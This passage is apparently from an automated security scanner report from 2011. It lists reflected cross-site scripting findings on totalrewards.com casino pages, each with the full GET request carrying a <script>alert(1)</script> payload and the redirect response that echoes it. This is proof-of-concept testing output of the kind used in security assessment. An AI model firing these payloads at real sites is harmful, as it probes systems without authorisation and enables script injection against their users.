Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response (redirected)

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:11 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 305
Location: https://www.totalrewards.com/TotalRewards/TotalRewards.do?601d8"><script>alert(1)</script>af00d96f63c=1

<html><body>The requested resource was moved. It could be found here: <a href="https://www.totalrewards.com/TotalRewards/TotalRewards.do?601d8"><script>alert(1)</script>af00d96f63c=1">https://www.tota
...[SNIP]...

3.4. http://www.totalrewards.com/TotalRewards/TotalRewards [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /TotalRewards/TotalRewards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4e7d2<script>alert(1)</script>709a8466dcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /TotalRewards/TotalRewards?4e7d2<script>alert(1)</script>709a8466dcb=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response (redirected)

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:11 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 301
Location: https://www.totalrewards.com/TotalRewards/TotalRewards.do?4e7d2<script>alert(1)</script>709a8466dcb=1

<html><body>The requested resource was moved. It could be found here: <a href="https://www.totalrewards.com/TotalRewards/TotalRewards.do?4e7d2<script>alert(1)</script>709a8466dcb=1">https://www.totalrewards.com/TotalRewards/TotalRewards.do?4e7d2<script>alert(1)</script>709a8466dcb=1</a>
...[SNIP]...

3.5. http://www.totalrewards.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/flamingo-las-vegas/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2eb54<script>alert(1)</script>541fc32b921 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/flamingo-las-vegas/hotel-casino/property-home.shtml?2eb54<script>alert(1)</script>541fc32b921=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:25 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 369
Location: http://www.flamingolasvegas.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml?2eb54<script>alert(1)</script>541fc32b921=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.flamingolasvegas.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml?2eb54<script>alert(1)</script>541fc32b921=1">http://www.flamingolasvegas.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml?2eb54<script>alert(1)</script>541fc32b921=1</a>
...[SNIP]...

3.6. http://www.totalrewards.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/flamingo-las-vegas/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c98c"><script>alert(1)</script>617f58fca41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/flamingo-las-vegas/hotel-casino/property-home.shtml?6c98c"><script>alert(1)</script>617f58fca41=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:25 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 373
Location: http://www.flamingolasvegas.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml?6c98c"><script>alert(1)</script>617f58fca41=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.flamingolasvegas.com/casinos/flamingo-las-vegas/hotel-casino/property-home.shtml?6c98c"><script>alert(1)</script>617f58fca41=1">
...[SNIP]...

3.7. http://www.totalrewards.com/casinos/grand-biloxi/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/grand-biloxi/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload afa16<script>alert(1)</script>72575c69e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/grand-biloxi/hotel-casino/property-home.shtml?afa16<script>alert(1)</script>72575c69e8=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:26 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 357
Location: http://www.grandcasinobiloxi.com/casinos/grand-biloxi/hotel-casino/property-home.shtml?afa16<script>alert(1)</script>72575c69e8=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.grandcasinobiloxi.com/casinos/grand-biloxi/hotel-casino/property-home.shtml?afa16<script>alert(1)</script>72575c69e8=1">http://www.grandcasinobiloxi.com/casinos/grand-biloxi/hotel-casino/property-home.shtml?afa16<script>alert(1)</script>72575c69e8=1</a>
...[SNIP]...

3.8. http://www.totalrewards.com/casinos/grand-biloxi/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/grand-biloxi/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aad3"><script>alert(1)</script>abd455a30f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/grand-biloxi/hotel-casino/property-home.shtml?3aad3"><script>alert(1)</script>abd455a30f4=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:26 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 363
Location: http://www.grandcasinobiloxi.com/casinos/grand-biloxi/hotel-casino/property-home.shtml?3aad3"><script>alert(1)</script>abd455a30f4=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.grandcasinobiloxi.com/casinos/grand-biloxi/hotel-casino/property-home.shtml?3aad3"><script>alert(1)</script>abd455a30f4=1">
...[SNIP]...

3.9. http://www.totalrewards.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 10484<script>alert(1)</script>92b6efad832 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml?10484<script>alert(1)</script>92b6efad832=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:27 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 361
Location: http://www.harveystahoe.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml?10484<script>alert(1)</script>92b6efad832=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.harveystahoe.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml?10484<script>alert(1)</script>92b6efad832=1">http://www.harveystahoe.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml?10484<script>alert(1)</script>92b6efad832=1</a>
...[SNIP]...

3.10. http://www.totalrewards.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164d2"><script>alert(1)</script>4ffc1ca95c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml?164d2"><script>alert(1)</script>4ffc1ca95c9=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:27 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 365
Location: http://www.harveystahoe.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml?164d2"><script>alert(1)</script>4ffc1ca95c9=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.harveystahoe.com/casinos/harveys-lake-tahoe/hotel-casino/property-home.shtml?164d2"><script>alert(1)</script>4ffc1ca95c9=1">
...[SNIP]...

3.11. http://www.totalrewards.com/casinos/imperial-palace/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/imperial-palace/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d59d9"><script>alert(1)</script>0536076507d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/imperial-palace/hotel-casino/property-home.shtml?d59d9"><script>alert(1)</script>0536076507d=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:26 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 363
Location: http://www.imperialpalace.com/casinos/imperial-palace/hotel-casino/property-home.shtml?d59d9"><script>alert(1)</script>0536076507d=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.imperialpalace.com/casinos/imperial-palace/hotel-casino/property-home.shtml?d59d9"><script>alert(1)</script>0536076507d=1">
...[SNIP]...

3.12. http://www.totalrewards.com/casinos/imperial-palace/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/imperial-palace/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 58843<script>alert(1)</script>4c63aebdf22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/imperial-palace/hotel-casino/property-home.shtml?58843<script>alert(1)</script>4c63aebdf22=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:26 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 359
Location: http://www.imperialpalace.com/casinos/imperial-palace/hotel-casino/property-home.shtml?58843<script>alert(1)</script>4c63aebdf22=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.imperialpalace.com/casinos/imperial-palace/hotel-casino/property-home.shtml?58843<script>alert(1)</script>4c63aebdf22=1">http://www.imperialpalace.com/casinos/imperial-palace/hotel-casino/property-home.shtml?58843<script>alert(1)</script>4c63aebdf22=1</a>
...[SNIP]...

3.13. http://www.totalrewards.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/paris-las-vegas/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50aee"><script>alert(1)</script>8a66c6af601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/paris-las-vegas/hotel-casino/property-home.shtml?50aee"><script>alert(1)</script>8a66c6af601=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:24 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 361
Location: http://www.parislasvegas.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml?50aee"><script>alert(1)</script>8a66c6af601=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.parislasvegas.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml?50aee"><script>alert(1)</script>8a66c6af601=1">
...[SNIP]...

3.14. http://www.totalrewards.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/paris-las-vegas/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8ab0f<script>alert(1)</script>4849ba779eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/paris-las-vegas/hotel-casino/property-home.shtml?8ab0f<script>alert(1)</script>4849ba779eb=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:24 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 357
Location: http://www.parislasvegas.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml?8ab0f<script>alert(1)</script>4849ba779eb=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.parislasvegas.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml?8ab0f<script>alert(1)</script>4849ba779eb=1">http://www.parislasvegas.com/casinos/paris-las-vegas/hotel-casino/property-home.shtml?8ab0f<script>alert(1)</script>4849ba779eb=1</a>
...[SNIP]...

3.15. http://www.totalrewards.com/casinos/planet-hollywood/hotel-casino/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/planet-hollywood/hotel-casino/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8409f"><script>alert(1)</script>bb1a54837cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/planet-hollywood/hotel-casino/?8409f"><script>alert(1)</script>bb1a54837cc=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:28 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 341
Location: http://www.planethollywoodresort.com/casinos/planet-hollywood/hotel-casino/?8409f"><script>alert(1)</script>bb1a54837cc=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.planethollywoodresort.com/casinos/planet-hollywood/hotel-casino/?8409f"><script>alert(1)</script>bb1a54837cc=1">
...[SNIP]...

3.16. http://www.totalrewards.com/casinos/planet-hollywood/hotel-casino/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/planet-hollywood/hotel-casino/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b04d9<script>alert(1)</script>ef3c02c52b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/planet-hollywood/hotel-casino/?b04d9<script>alert(1)</script>ef3c02c52b5=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:28 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 337
Location: http://www.planethollywoodresort.com/casinos/planet-hollywood/hotel-casino/?b04d9<script>alert(1)</script>ef3c02c52b5=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.planethollywoodresort.com/casinos/planet-hollywood/hotel-casino/?b04d9<script>alert(1)</script>ef3c02c52b5=1">http://www.planethollywoodresort.com/casinos/planet-hollywood/hotel-casino/?b04d9<script>alert(1)</script>ef3c02c52b5=1</a>
...[SNIP]...

3.17. http://www.totalrewards.com/casinos/rio/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/rio/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35347"><script>alert(1)</script>247efd3a022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/rio/hotel-casino/property-home.shtml?35347"><script>alert(1)</script>247efd3a022=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:24 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 333
Location: http://www.riolasvegas.com/casinos/rio/hotel-casino/property-home.shtml?35347"><script>alert(1)</script>247efd3a022=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.riolasvegas.com/casinos/rio/hotel-casino/property-home.shtml?35347"><script>alert(1)</script>247efd3a022=1">ht
...[SNIP]...

3.18. http://www.totalrewards.com/casinos/rio/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/rio/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b0f3d<script>alert(1)</script>a536d033cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /casinos/rio/hotel-casino/property-home.shtml?b0f3d<script>alert(1)</script>a536d033cd=1 HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Mar 2011 13:52:24 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 327
Location: http://www.riolasvegas.com/casinos/rio/hotel-casino/property-home.shtml?b0f3d<script>alert(1)</script>a536d033cd=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.riolasvegas.com/casinos/rio/hotel-casino/property-home.shtml?b0f3d<script>alert(1)</script>a536d033cd=1">http://www.riolasvegas.com/casinos/rio/hotel-casino/property-home.shtml?b0f3d<script>alert(1)</script>a536d033cd=1</a>
...[SNIP]...

3.19. http://www.totalrewards.com/casinos/showboat-atlantic-city/hotel-casino/property-home.shtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.totalrewards.com
Path:   /casinos/showboat-atlantic-city/hotel-casino/property-home.shtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c9cae<script>alert(1)</script>995c908484d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

